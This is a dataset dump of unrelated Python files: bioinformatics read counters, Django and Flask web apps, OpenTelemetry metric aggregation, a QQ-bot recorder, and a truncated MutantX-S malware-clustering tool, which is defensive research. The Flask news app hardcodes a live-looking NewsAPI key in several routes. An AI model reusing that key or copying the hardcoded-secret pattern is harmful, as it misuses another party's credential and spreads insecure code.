content
stringlengths 5
1.05M
|
|---|
import glob
import gzip
import os
from collections import defaultdict
__author__ = "jkkim"
def parse_fasta(fa_handler):
'''
takes a file handler. so if you want to use this function then put the with statement before this function
:param fa_handler:
:return:
'''
name, seq = None, []
for line in fa_handler:
line = line.strip()
if line.startswith(">"):
if name:
yield (name, ''.join(seq))
name = line.split()[0][1:]
seq = []
else:
seq.append(line)
if name:
yield (name, ''.join(seq))
def count_fq_gz(fname):
with gzip.open(fname, 'rt')as fin:
for i, _ in enumerate(fin, start=1):
pass
return i / 4
def count_file(fname):
with open(fname, 'rt') as fin:
for i, _ in enumerate(fin, start=1):
pass
return i
def check_dir(dir):
if not os.path.isdir(dir):
print(
"{} is not found!".format(
dir,
)
)
raise ValueError
def check_file(file_name):
if not os.path.isfile(file_name):
print(
"{} is not found!".format(
file_name,
)
)
raise ValueError
def count_fasta(fname):
cnt = 0
with open(fname, 'rt')as fin:
for line in fin:
if line.startswith(">"):
cnt += 1
return cnt
def count_sample_reads_fa(sample_list, fasta):
result = defaultdict(int)
sample_set = set(sample_list)
with open(fasta, 'rt')as fin:
for gene, _ in parse_fasta(fin):
sample_id = gene.split("_")[0]
if sample_id in sample_set:
result[sample_id] += 1
return result
def count_trimmed_gz(input_dir):
result = defaultdict(int)
fq_list = [i for i in glob.glob(os.path.join(input_dir, "*_R1_*.gz")) if os.path.isfile(i)]
for i in fq_list:
sample_name = os.path.basename(i).split("_")[0]
result[sample_name] = count_fq_gz(i)
return result
|
from .execute import simple_execute
__all__ = [
'simple_execute',
]
|
from django.core.urlresolvers import reverse
from django.http import HttpResponseForbidden
from django.views.generic.edit import CreateView
from django.views.generic.list import ListView
from core.mixins import LoginRequiredMixin
from .forms import ProductForm
from .models import Product
class ProductListView(LoginRequiredMixin, ListView):
context_name = 'product_list'
def get_queryset(self):
return Product.objects.filter(
stok__gt=0
)
class ProductCreateView(LoginRequiredMixin, CreateView):
model = Product
form_class = ProductForm
def get_success_url(self):
return reverse('shop:product_list')
def post(self, request, *args, **kwargs):
if request.user.is_superuser:
return super(ProductCreateView, self).post(
request, *args, **kwargs
)
return HttpResponseForbidden()
def get(self, request, *args, **kwargs):
if request.user.is_superuser:
return super(ProductCreateView, self).get(
request, *args, **kwargs
)
return HttpResponseForbidden()
|
import unittest
from os import path
from src.utils.config import Configuration
# from src.utils.reader import ReaderLogFile
class TestConfigMethods(unittest.TestCase):
def setUp(self) -> None:
self.configurator = Configuration("./src/config.ini")
return super().setUp()
def test_printAllGroupSettings(self):
print(self.configurator.getSections())
self.assertIs(type(self.configurator.getSections()), list)
# class TestReaderMethods(unittest.TestCase):
# def setUp(self) -> None:
# self.filePath = path.abspath("./data/9 January,Saturday.htm")
# self.lastLine = 19
# self.initLine = 17
# return super().setUp()
# def test_convertLogToJSON(self):
# reader = ReaderLogFile(self.filePath)
# jsonText = reader.getJson(reader.getLines())
# self.assertIs(type(jsonText), str)
# self.assertEqual(reader.lastLine, self.lastLine,
# "Numero final de linea incorrecto")
|
from flask import Flask, render_template
from newsapi import NewsApiClient
app = Flask(__name__)
@app.route('/')
def index():
newsapi = NewsApiClient(api_key = 'c43cae8199d1435fa1e4cc0737cd4a88')
topheadlines = newsapi.get_top_headlines(sources = "al-jazeera-english")
articles = topheadlines['articles']
desc = []
news = []
img = []
pubAt=[]
url= []
for i in range (len(articles)):
myarticles = articles [i]
news.append(myarticles['title'])
desc.append(myarticles['description'])
img.append(myarticles['urlToImage'])
pubAt.append(myarticles['publishedAt'])
url.append(myarticles['url'])
myList = zip(news, desc, img)
return render_template ('index.html', context = myList)
@app.route('/abc')
def abc():
"""
A view root page function that returns the index page and its data
"""
newsapi = NewsApiClient(api_key="c43cae8199d1435fa1e4cc0737cd4a88")
topheadlines = newsapi.get_top_headlines(sources="abc-news-au")
articles = topheadlines['articles']
des=[]
image=[]
news=[]
pubAt=[]
url= []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
image.append(myarticles['urlToImage'])
des.append(myarticles['description'])
pubAt.append(myarticles['publishedAt'])
url.append(myarticles['url'])
mylist=zip(des,image,news,pubAt,url)
return render_template('abc.html', context = mylist)
@app.route('/bbc')
def bbc():
"""
A view root page function that returns the index page and its data
"""
newsapi = NewsApiClient(api_key="c43cae8199d1435fa1e4cc0737cd4a88")
topheadlines = newsapi.get_top_headlines(sources="al-jazeera-english")
articles = topheadlines['articles']
des=[]
image=[]
news=[]
pubAt=[]
url= []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
image.append(myarticles['urlToImage'])
des.append(myarticles['description'])
pubAt.append(myarticles['publishedAt'])
url.append(myarticles['url'])
mylist=zip(des,image,news,pubAt,url)
return render_template('bbc.html', context = mylist)
@app.route('/cnn')
def cnn():
"""
A view root page function that returns the index page and its data
"""
newsapi = NewsApiClient(api_key="c43cae8199d1435fa1e4cc0737cd4a88")
topheadlines = newsapi.get_top_headlines(sources="abc-news-au")
articles = topheadlines['articles']
des=[]
image=[]
news=[]
pubAt=[]
url= []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
image.append(myarticles['urlToImage'])
des.append(myarticles['description'])
pubAt.append(myarticles['publishedAt'])
url.append(myarticles['url'])
mylist=zip(des,image,news,pubAt,url)
return render_template('cnn.html', context = mylist)
@app.route('/aljazeera')
def aljazeera():
"""
A view root page function that returns the index page and its data
"""
newsapi = NewsApiClient(api_key="c43cae8199d1435fa1e4cc0737cd4a88")
topheadlines = newsapi.get_top_headlines(sources="al-jazeera-english")
articles = topheadlines['articles']
des=[]
image=[]
news=[]
pubAt=[]
url= []
for i in range(len(articles)):
myarticles = articles[i]
news.append(myarticles['title'])
image.append(myarticles['urlToImage'])
des.append(myarticles['description'])
pubAt.append(myarticles['publishedAt'])
url.append(myarticles['url'])
mylist=zip(des,image,news,pubAt,url)
return render_template('aljazeera.html', context = mylist)
if __name__ == "__main__":
app.run(debug=True)
|
# Generated by Django 2.2.13 on 2020-09-21 01:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('library', '0021_auto_20200917_0103'),
]
operations = [
migrations.AlterField(
model_name='bookversion',
name='language',
field=models.TextField(default='en-US', max_length=5),
),
]
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABC, abstractmethod
from bisect import bisect_left
from enum import IntEnum
from logging import getLogger
from math import inf
from threading import Lock
from typing import Generic, List, Optional, Sequence, TypeVar
from opentelemetry.metrics import (
Asynchronous,
Counter,
Histogram,
Instrument,
ObservableCounter,
ObservableGauge,
ObservableUpDownCounter,
Synchronous,
UpDownCounter,
)
from opentelemetry.sdk.metrics._internal.measurement import Measurement
from opentelemetry.sdk.metrics._internal.point import Gauge
from opentelemetry.sdk.metrics._internal.point import (
Histogram as HistogramPoint,
)
from opentelemetry.sdk.metrics._internal.point import (
HistogramDataPoint,
NumberDataPoint,
Sum,
)
from opentelemetry.util.types import Attributes
_DataPointVarT = TypeVar("_DataPointVarT", NumberDataPoint, HistogramDataPoint)
_logger = getLogger(__name__)
class AggregationTemporality(IntEnum):
"""
The temporality to use when aggregating data.
Can be one of the following values:
"""
UNSPECIFIED = 0
DELTA = 1
CUMULATIVE = 2
class _Aggregation(ABC, Generic[_DataPointVarT]):
def __init__(self, attributes: Attributes):
self._lock = Lock()
self._attributes = attributes
self._previous_point = None
@abstractmethod
def aggregate(self, measurement: Measurement) -> None:
pass
@abstractmethod
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[_DataPointVarT]:
pass
class _DropAggregation(_Aggregation):
def aggregate(self, measurement: Measurement) -> None:
pass
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[_DataPointVarT]:
pass
class _SumAggregation(_Aggregation[Sum]):
def __init__(
self,
attributes: Attributes,
instrument_is_monotonic: bool,
instrument_temporality: AggregationTemporality,
start_time_unix_nano: int,
):
super().__init__(attributes)
self._start_time_unix_nano = start_time_unix_nano
self._instrument_temporality = instrument_temporality
self._instrument_is_monotonic = instrument_is_monotonic
if self._instrument_temporality is AggregationTemporality.DELTA:
self._value = 0
else:
self._value = None
def aggregate(self, measurement: Measurement) -> None:
with self._lock:
if self._value is None:
self._value = 0
self._value = self._value + measurement.value
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[NumberDataPoint]:
"""
Atomically return a point for the current value of the metric and
reset the aggregation value.
"""
if self._instrument_temporality is AggregationTemporality.DELTA:
with self._lock:
value = self._value
start_time_unix_nano = self._start_time_unix_nano
self._value = 0
self._start_time_unix_nano = collection_start_nano
else:
with self._lock:
if self._value is None:
return None
value = self._value
self._value = None
start_time_unix_nano = self._start_time_unix_nano
current_point = NumberDataPoint(
attributes=self._attributes,
start_time_unix_nano=start_time_unix_nano,
time_unix_nano=collection_start_nano,
value=value,
)
if self._previous_point is None or (
self._instrument_temporality is aggregation_temporality
):
# Output DELTA for a synchronous instrument
# Output CUMULATIVE for an asynchronous instrument
self._previous_point = current_point
return current_point
if aggregation_temporality is AggregationTemporality.DELTA:
# Output temporality DELTA for an asynchronous instrument
value = current_point.value - self._previous_point.value
output_start_time_unix_nano = self._previous_point.time_unix_nano
else:
# Output CUMULATIVE for a synchronous instrument
value = current_point.value + self._previous_point.value
output_start_time_unix_nano = (
self._previous_point.start_time_unix_nano
)
current_point = NumberDataPoint(
attributes=self._attributes,
start_time_unix_nano=output_start_time_unix_nano,
time_unix_nano=current_point.time_unix_nano,
value=value,
)
self._previous_point = current_point
return current_point
class _LastValueAggregation(_Aggregation[Gauge]):
def __init__(self, attributes: Attributes):
super().__init__(attributes)
self._value = None
def aggregate(self, measurement: Measurement):
with self._lock:
self._value = measurement.value
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[_DataPointVarT]:
"""
Atomically return a point for the current value of the metric.
"""
with self._lock:
if self._value is None:
return None
value = self._value
self._value = None
return NumberDataPoint(
attributes=self._attributes,
start_time_unix_nano=0,
time_unix_nano=collection_start_nano,
value=value,
)
class _ExplicitBucketHistogramAggregation(_Aggregation[HistogramPoint]):
def __init__(
self,
attributes: Attributes,
start_time_unix_nano: int,
boundaries: Sequence[float] = (
0.0,
5.0,
10.0,
25.0,
50.0,
75.0,
100.0,
250.0,
500.0,
1000.0,
),
record_min_max: bool = True,
):
super().__init__(attributes)
self._boundaries = tuple(boundaries)
self._bucket_counts = self._get_empty_bucket_counts()
self._min = inf
self._max = -inf
self._sum = 0
self._record_min_max = record_min_max
self._start_time_unix_nano = start_time_unix_nano
# It is assumed that the "natural" aggregation temporality for a
# Histogram instrument is DELTA, like the "natural" aggregation
# temporality for a Counter is DELTA and the "natural" aggregation
# temporality for an ObservableCounter is CUMULATIVE.
self._instrument_temporality = AggregationTemporality.DELTA
def _get_empty_bucket_counts(self) -> List[int]:
return [0] * (len(self._boundaries) + 1)
def aggregate(self, measurement: Measurement) -> None:
value = measurement.value
if self._record_min_max:
self._min = min(self._min, value)
self._max = max(self._max, value)
self._sum += value
self._bucket_counts[bisect_left(self._boundaries, value)] += 1
def collect(
self,
aggregation_temporality: AggregationTemporality,
collection_start_nano: int,
) -> Optional[_DataPointVarT]:
"""
Atomically return a point for the current value of the metric.
"""
with self._lock:
if not any(self._bucket_counts):
return None
bucket_counts = self._bucket_counts
start_time_unix_nano = self._start_time_unix_nano
sum_ = self._sum
max_ = self._max
min_ = self._min
self._bucket_counts = self._get_empty_bucket_counts()
self._start_time_unix_nano = collection_start_nano
self._sum = 0
self._min = inf
self._max = -inf
current_point = HistogramDataPoint(
attributes=self._attributes,
start_time_unix_nano=start_time_unix_nano,
time_unix_nano=collection_start_nano,
count=sum(bucket_counts),
sum=sum_,
bucket_counts=tuple(bucket_counts),
explicit_bounds=self._boundaries,
min=min_,
max=max_,
)
if self._previous_point is None or (
self._instrument_temporality is aggregation_temporality
):
self._previous_point = current_point
return current_point
max_ = current_point.max
min_ = current_point.min
if aggregation_temporality is AggregationTemporality.CUMULATIVE:
start_time_unix_nano = self._previous_point.start_time_unix_nano
sum_ = current_point.sum + self._previous_point.sum
# Only update min/max on delta -> cumulative
max_ = max(current_point.max, self._previous_point.max)
min_ = min(current_point.min, self._previous_point.min)
bucket_counts = [
curr_count + prev_count
for curr_count, prev_count in zip(
current_point.bucket_counts,
self._previous_point.bucket_counts,
)
]
else:
start_time_unix_nano = self._previous_point.time_unix_nano
sum_ = current_point.sum - self._previous_point.sum
bucket_counts = [
curr_count - prev_count
for curr_count, prev_count in zip(
current_point.bucket_counts,
self._previous_point.bucket_counts,
)
]
current_point = HistogramDataPoint(
attributes=self._attributes,
start_time_unix_nano=start_time_unix_nano,
time_unix_nano=current_point.time_unix_nano,
count=sum(bucket_counts),
sum=sum_,
bucket_counts=tuple(bucket_counts),
explicit_bounds=current_point.explicit_bounds,
min=min_,
max=max_,
)
self._previous_point = current_point
return current_point
class Aggregation(ABC):
"""
Base class for all aggregation types.
"""
@abstractmethod
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
"""Creates an aggregation"""
class DefaultAggregation(Aggregation):
"""
The default aggregation to be used in a `View`.
This aggregation will create an actual aggregation depending on the
instrument type, as specified next:
==================================================== ====================================
Instrument Aggregation
==================================================== ====================================
`opentelemetry.sdk.metrics.Counter` `SumAggregation`
`opentelemetry.sdk.metrics.UpDownCounter` `SumAggregation`
`opentelemetry.sdk.metrics.ObservableCounter` `SumAggregation`
`opentelemetry.sdk.metrics.ObservableUpDownCounter` `SumAggregation`
`opentelemetry.sdk.metrics.Histogram` `ExplicitBucketHistogramAggregation`
`opentelemetry.sdk.metrics.ObservableGauge` `LastValueAggregation`
==================================================== ====================================
"""
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
# pylint: disable=too-many-return-statements
if isinstance(instrument, Counter):
return _SumAggregation(
attributes,
instrument_is_monotonic=True,
instrument_temporality=AggregationTemporality.DELTA,
start_time_unix_nano=start_time_unix_nano,
)
if isinstance(instrument, UpDownCounter):
return _SumAggregation(
attributes,
instrument_is_monotonic=False,
instrument_temporality=AggregationTemporality.DELTA,
start_time_unix_nano=start_time_unix_nano,
)
if isinstance(instrument, ObservableCounter):
return _SumAggregation(
attributes,
instrument_is_monotonic=True,
instrument_temporality=AggregationTemporality.CUMULATIVE,
start_time_unix_nano=start_time_unix_nano,
)
if isinstance(instrument, ObservableUpDownCounter):
return _SumAggregation(
attributes,
instrument_is_monotonic=False,
instrument_temporality=AggregationTemporality.CUMULATIVE,
start_time_unix_nano=start_time_unix_nano,
)
if isinstance(instrument, Histogram):
return _ExplicitBucketHistogramAggregation(
attributes, start_time_unix_nano
)
if isinstance(instrument, ObservableGauge):
return _LastValueAggregation(attributes)
raise Exception(f"Invalid instrument type {type(instrument)} found")
class ExplicitBucketHistogramAggregation(Aggregation):
"""This aggregation informs the SDK to collect:
- Count of Measurement values falling within explicit bucket boundaries.
- Arithmetic sum of Measurement values in population. This SHOULD NOT be collected when used with instruments that record negative measurements, e.g. UpDownCounter or ObservableGauge.
- Min (optional) Measurement value in population.
- Max (optional) Measurement value in population.
Args:
boundaries: Array of increasing values representing explicit bucket boundary values.
record_min_max: Whether to record min and max.
"""
def __init__(
self,
boundaries: Sequence[float] = (
0.0,
5.0,
10.0,
25.0,
50.0,
75.0,
100.0,
250.0,
500.0,
1000.0,
),
record_min_max: bool = True,
) -> None:
self._boundaries = boundaries
self._record_min_max = record_min_max
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
return _ExplicitBucketHistogramAggregation(
attributes,
start_time_unix_nano,
self._boundaries,
self._record_min_max,
)
class SumAggregation(Aggregation):
"""This aggregation informs the SDK to collect:
- The arithmetic sum of Measurement values.
"""
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
temporality = AggregationTemporality.UNSPECIFIED
if isinstance(instrument, Synchronous):
temporality = AggregationTemporality.DELTA
elif isinstance(instrument, Asynchronous):
temporality = AggregationTemporality.CUMULATIVE
return _SumAggregation(
attributes,
isinstance(instrument, (Counter, ObservableCounter)),
temporality,
start_time_unix_nano,
)
class LastValueAggregation(Aggregation):
"""
This aggregation informs the SDK to collect:
- The last Measurement.
- The timestamp of the last Measurement.
"""
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
return _LastValueAggregation(attributes)
class DropAggregation(Aggregation):
"""Using this aggregation will make all measurements be ignored."""
def _create_aggregation(
self,
instrument: Instrument,
attributes: Attributes,
start_time_unix_nano: int,
) -> _Aggregation:
return _DropAggregation(attributes)
|
""" 数据记录插件
记录排行版插件,历史插件,状态插件所需的数据
如果遇到老版本数据,则自动升级
"""
from datetime import datetime, timedelta
from coolqbot import PluginData, bot
VERSION = '1'
DATA = PluginData('recorder')
def get_history_pkl_name(dt: datetime):
time_str = dt.strftime('%Y-%m')
return time_str
def update(data: list, group_id: int):
""" 升级脚本
升级 0.8.1 及以前版本的 recorder 数据。
"""
# 判断是那种类型的数据
if isinstance(list(data.values())[0], int):
return update_old_1(data, group_id)
else:
return update_old_2(data, group_id)
def update_old_1(data: list, group_id: int):
""" 升级 0.7.0 之前版本的数据
"""
new_data = {}
# 添加版本信息
new_data['version'] = VERSION
# 升级 last_message_on
new_data['last_message_on'] = {}
new_data['last_message_on'][group_id] = data['last_message_on']
# 升级 msg_send_time
new_data['msg_send_time'] = {}
new_data['msg_send_time'][group_id] = []
# 升级 repeat_list
new_data['repeat_list'] = {}
new_data['repeat_list'][group_id] = data['repeat_list']
# 升级 msg_number_list
new_data['msg_number_list'] = {}
new_data['msg_number_list'][group_id] = data['msg_number_list']
return new_data
def update_old_2(data: list, group_id: int):
""" 升级 0.7.0-0.8.1 版本的 recorder 数据
"""
new_data = {}
# 添加版本信息
new_data['version'] = VERSION
# 升级 last_message_on
new_data['last_message_on'] = {}
new_data['last_message_on'][group_id] = data['last_message_on']
# 升级 msg_send_time
new_data['msg_send_time'] = {}
new_data['msg_send_time'][group_id] = []
# 升级 repeat_list
new_data['repeat_list'] = {}
new_data['repeat_list'][group_id] = data['repeat_list']
# 升级 msg_number_list
new_data['msg_number_list'] = {}
new_data['msg_number_list'][group_id] = data['msg_number_list']
return new_data
class Recorder:
def __init__(self, name: str, data: PluginData):
self._name = name
self._data = data
# 初始化运行数据
self.init_data()
# 机器人状态
# 启动时间
self.start_time = datetime.now()
# 酷Q 状态
self.coolq_status = False
# 是否需要发送问好
self.send_hello = False
self._load_data()
def message_number(self, x: int, group_id: int):
""" 返回指定群 x 分钟内的消息条数,并清除之前的消息记录
"""
times = self._msg_send_time[group_id]
now = datetime.now()
for i in range(len(times)):
if times[i] > now - timedelta(minutes=x):
times = times[i:]
return len(times)
# 如果没有满足条件的消息,则清除记录
times = []
return len(times)
def repeat_list(self, group_id: int):
""" 获取指定群整个月的复读记录
"""
return self._merge_list(self._repeat_list[group_id])
def msg_number_list(self, group_id: int):
""" 获取指定群整个月的消息数量记录
"""
return self._merge_list(self._msg_number_list[group_id])
def repeat_list_by_day(self, day, group_id: int):
""" 获取指定群某一天的复读记录
"""
if day in self._repeat_list[group_id]:
return self._repeat_list[group_id][day]
return {}
def msg_number_list_by_day(self, day, group_id: int):
""" 获取指定群某一天的消息数量记录
"""
if day in self._msg_number_list[group_id]:
return self._msg_number_list[group_id][day]
return {}
def add_repeat_list(self, qq, group_id: int):
""" 该 QQ 号在指定群的复读记录,加一
"""
self._add_to_list(self._repeat_list, qq, group_id)
def add_msg_number_list(self, qq, group_id: int):
""" 该 QQ 号在指定群的消息数量记录,加一
"""
self._add_to_list(self._msg_number_list, qq, group_id)
def add_msg_send_time(self, time, group_id: int):
""" 将这个时间加入到指定群的消息发送时间列表中
"""
self._msg_send_time[group_id].append(time)
def last_message_on(self, group_id: int):
return self._last_message_on[group_id]
def reset_last_message_on(self, group_id: int):
self._last_message_on[group_id] = datetime.now()
def _add_to_list(self, recrod_list, qq, group_id: int):
""" 添加数据进列表
"""
day = datetime.now().day
if day not in recrod_list[group_id]:
recrod_list[group_id][day] = {}
try:
recrod_list[group_id][day][qq] += 1
except KeyError:
recrod_list[group_id][day][qq] = 1
def _merge_list(self, recrod_list):
""" 合并词典中按天数存储的数据
"""
new_list = {}
for day_list in recrod_list:
for qq in recrod_list[day_list]:
if qq in new_list:
new_list[qq] += recrod_list[day_list][qq]
else:
new_list[qq] = recrod_list[day_list][qq]
return new_list
def _load_data(self):
""" 加载数据
"""
if not self._data.exists(f'{self._name}.pkl'):
bot.logger.error(f'{self._name}.pkl does not exist!')
return
data = self._data.load_pkl(self._name)
# 如果是老版本格式的数据则先升级在加载
# 默认使用配置中第一个群来升级老数据
if 'version' not in data or data['version'] != VERSION:
bot.logger.info('发现旧版本数据,正在升级数据')
data = update(data, bot.get_bot().config.GROUP_ID[0])
self._data.save_pkl(data, self._name)
bot.logger.info('升级数据成功')
# 加载数据
self._last_message_on = data['last_message_on']
self._msg_send_time = data['msg_send_time']
self._repeat_list = data['repeat_list']
self._msg_number_list = data['msg_number_list']
# 如果群列表新加了群,则补充所需的数据
for group_id in bot.get_bot().config.GROUP_ID:
if group_id not in self._last_message_on:
self._last_message_on[group_id] = datetime.now()
if group_id not in self._msg_send_time:
self._msg_send_time[group_id] = []
if group_id not in self._repeat_list:
self._repeat_list[group_id] = {}
if group_id not in self._msg_number_list:
self._msg_number_list[group_id] = {}
def save_data(self):
""" 保存数据
"""
self._data.save_pkl(self.get_data(), self._name)
def get_data(self):
""" 获取当前数据
并附带上数据的版本
"""
return {
'version': VERSION,
'last_message_on': self._last_message_on,
'msg_send_time': self._msg_send_time,
'repeat_list': self._repeat_list,
'msg_number_list': self._msg_number_list
}
def init_data(self):
""" 初始化数据
"""
self._last_message_on = {
group_id: datetime.now()
for group_id in bot.get_bot().config.GROUP_ID
}
self._msg_send_time = {
group_id: []
for group_id in bot.get_bot().config.GROUP_ID
}
self._repeat_list = {
group_id: {}
for group_id in bot.get_bot().config.GROUP_ID
}
self._msg_number_list = {
group_id: {}
for group_id in bot.get_bot().config.GROUP_ID
}
recorder = Recorder('recorder', DATA)
@bot.scheduler.scheduled_job('interval', minutes=1, id='save_recorder')
async def save_recorder():
""" 每隔一分钟保存一次数据
"""
# 保存数据前先清理 msg_send_time 列表,仅保留最近 10 分钟的数据
for group_id in bot.get_bot().config.GROUP_ID:
recorder.message_number(10, group_id)
recorder.save_data()
|
"""
MutantX-S Implementation for EMBER Function Imports
This work is our rendition of MutantX-S, a static malware classification system.
@Authors: Noah MacAskill and Zachary Wilkins
"""
import random
from json import loads, dump
from sys import argv
from collections import OrderedDict, Counter
import logging as lg
import csv
from datetime import datetime
import numpy as np
from numpy import vstack
from scipy.sparse import csr_matrix
from sklearn.feature_extraction import FeatureHasher
from sklearn.metrics import pairwise_distances, f1_score, homogeneity_completeness_v_measure, \
precision_recall_fscore_support
from sklearn.preprocessing import normalize
from tqdm import tqdm
def main():
file_names = md5_file = n = p_max = d_min = None
# Store parameters if given via command line
if len(argv) > 1:
n = int(argv[1])
p_max = float(argv[2])
d_min = float(argv[3])
md5_file = argv[4]
file_names = argv[5:]
# Receive n from user if not given
if n is None:
n = int(input("Select size of N-grams: "))
# Retrieve p_max from user if not given
if p_max is None:
p_max = float(input("Select p_max: "))
# Retrieve d_min from user if not given
if d_min is None:
d_min = float(input("Select d_min: "))
# Import required information from EMBER
info_list, record_list, md5_to_avclass = open_ember_files(md5_file, file_names)
lg.info('Loaded records from {} samples, converting to N-Grams...'.format(len(info_list)))
# Convert function import info into N-grams
md5_to_ngrams = convert_function_imports_to_ngrams(info_list, record_list, n)
lg.info('Converting to feature vectors...')
# Convert N-grams into feature vectors
md5_to_fvs, int_to_ngram = create_feature_vectors_from_ngrams(md5_to_ngrams)
lg.info('Hashing feature vectors...')
# Reduce the dimensions of the feature vectors using the feature hashing trick
feature_matrix = reduce_dimensions_hashing_trick(md5_to_fvs)
lg.info('Selecting prototypes...')
# Select a group of prototypes from the samples
prototypes, prototypes_to_data_points = select_prototypes(feature_matrix, p_max)
lg.info('Clustering {} prototypes...'.format(len(prototypes)))
# Cluster the prototypes
clustered_prototypes = cluster_prototypes(feature_matrix, prototypes, d_min)
lg.info('Converting indices back to MD5s...')
# Creates the final clusters of md5s
md5_clusters, md5_prototype_clusters = indices_to_md5s(clustered_prototypes, prototypes_to_data_points,
list(md5_to_fvs.keys()))
lg.info('Scoring clustering...')
# Score the clustering
results, labels_accuracy = score_clustering(md5_clusters, md5_prototype_clusters, md5_to_avclass)
lg.info('Creating signatures for each cluster...')
# Create signatures for each cluster
signatures = cluster_signatures(int_to_ngram, md5_clusters, md5_to_fvs)
lg.info('Log results...')
# Log the final results
log_results(results, n, p_max, d_min, md5_clusters, md5_prototype_clusters, md5_to_avclass, signatures,
labels_accuracy)
lg.info('Done!')
def open_ember_files(md5_file_name, file_names: list = None) -> tuple:
"""
Import required information from EMBER data
Parameters
----------
md5_file_name:
The name of the file containing the samples (MD5s) to be clustered
file_names : list
A list of files to search through for the malware samples to be clustered
Returns
-------
(list, list)
list of md5s, their respective number of function imports, and their AVClass labeling
list of information on each function imports
"""
if md5_file_name is None:
md5_file_name = input("Select MD5 file: ")
# Open list of md5s representing the samples to be clustered
md5_file = open(md5_file_name, 'r')
md5s = list()
# Read in each md5
for line in md5_file:
md5s.append(line[:-1])
md5_file.close()
info_list = list()
record_list = list()
md5_to_avclass = dict()
# Retrieve file names from user if not given
if file_names is None:
file_names = input("Select file names separated by spaces: ")
file_names = file_names.split()
# Import required information from each file
for file_name in tqdm(file_names, desc='LoadFiles'):
lg.info('Loading records from file: {}'.format(file_name))
with open(file_name, 'r') as f:
# Import required information from each malware sample (line of file)
for line in f:
json_doc = loads(line)
md5 = json_doc['md5']
# If one of the md5s we're searching for is found, store its information
if md5 in md5s:
imports = json_doc['imports']
avclass = json_doc['avclass']
one_sample_records = list()
count = 0
for library in imports:
for function in filter(None, imports[library]):
count += 1
one_sample_records.append((md5, library, function))
if count >= 4:
info_list.append((md5, str(count)))
record_list.extend(one_sample_records.copy())
one_sample_records.clear()
md5_to_avclass[md5] = avclass
return info_list, record_list, md5_to_avclass
def convert_function_imports_to_ngrams(info_list: list, record_list: list, n: int) -> dict:
"""Converts functions imported by malware samples to N-grams
representing potential behaviours of those samples.
Parameters
----------
info_list : list
A list containing exactly one tuple per malware sample,
where tuples are of the form (MD5, number of imports)
record_list : list
A list containing a variable number of tuples per malware
sample, where tuples are of the form: (MD5, library, function)
n : int
The window size for the N-grams
Returns
-------
dict
a mapping of str to list: MD5 to list of N-grams
"""
import_index = 0
md5_to_ngrams = OrderedDict()
# Iterate over function imports for each malware sample, creating N-grams along the way
for md5, num_imports in tqdm(info_list, desc='MakeN-Grams'):
md5_to_ngrams[md5] = list()
for index in range(import_index, import_index + int(num_imports) - n + 1):
ngram = tuple([record[1].lower() + "," + record[2].lower() for record in record_list[index:index + n]])
md5_to_ngrams[md5].append(ngram)
import_index += int(num_imports)
return md5_to_ngrams
def create_feature_vectors_from_ngrams(sample_to_ngrams: dict) -> tuple:
"""Create feature vectors for each malware sample, where an integer
in the vector represents the presence of a corresponding N-gram in
that sample.
Parameters
----------
sample_to_ngrams : dict
A dict mapping str to lists: MD5 to list of N-grams
Returns
-------
(dict, dict)
a mapping of str to list: MD5 to feature vector (list of ints)
a mapping of int to str: numerical encoding to N-gram
"""
# Create a set of each observed N-gram
ngrams = {ngram for ngram_list in sample_to_ngrams.values() for ngram in ngram_list}
# Create a unique numerical encoding for each observed N-gram
ngram_encodings = {encoding: ngram for encoding, ngram in zip(range(len(ngrams)), ngrams)}
# Create a reverse dictionary from N-grams to encodings
encodings_reverse_dict = {v: k for k, v in ngram_encodings.items()}
# Create feature vectors to represent each sample
md5_vector_mapping = OrderedDict()
for md5, ngram_list in tqdm(sample_to_ngrams.items(), desc='CreateFVs'):
md5_vector_mapping[md5] = [0] * len(ngram_encodings)
for ngram in ngram_list:
md5_vector_mapping[md5][encodings_reverse_dict[ngram]] += 1
return md5_vector_mapping, ngram_encodings
def reduce_dimensions_hashing_trick(md5_vector_mapping: dict) -> csr_matrix:
"""Reduce dimensions to a vector of a fixed-length by
applying the hashing trick.
The scikit-learn feature hasher was employed here:
https://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.FeatureHasher.html
Parameters
----------
md5_vector_mapping : dict
A mapping of str to list: MD5 to feature vector (list of ints)
Returns
-------
sparse matrix of shape (n_samples, n_features)
Feature matrix from hashed n-grams.
"""
# Create a feature hasher
h = FeatureHasher(2 ** 12, input_type="string", alternate_sign=False)
fv_matrix = list()
# For each sample, identify the indices relating to the n-grams that sample contains
# Store the information in a feature value matrix
for fv in tqdm(md5_vector_mapping.values(), desc='BuildStrFVs'):
indices = [str(i) for i in range(len(fv)) if fv[i] > 0]
fv_matrix.append(indices)
# Hash the results to a smaller matrix using the feature hasher
hashed_matrix = h.transform(fv_matrix)
return hashed_matrix
def select_prototypes(feature_matrix: csr_matrix, p_max: float) -> tuple:
"""Select prototypes from the matrix of hashed feature vectors.
Parameters
----------
feature_matrix : sparse matrix of shape (n_samples, n_features)
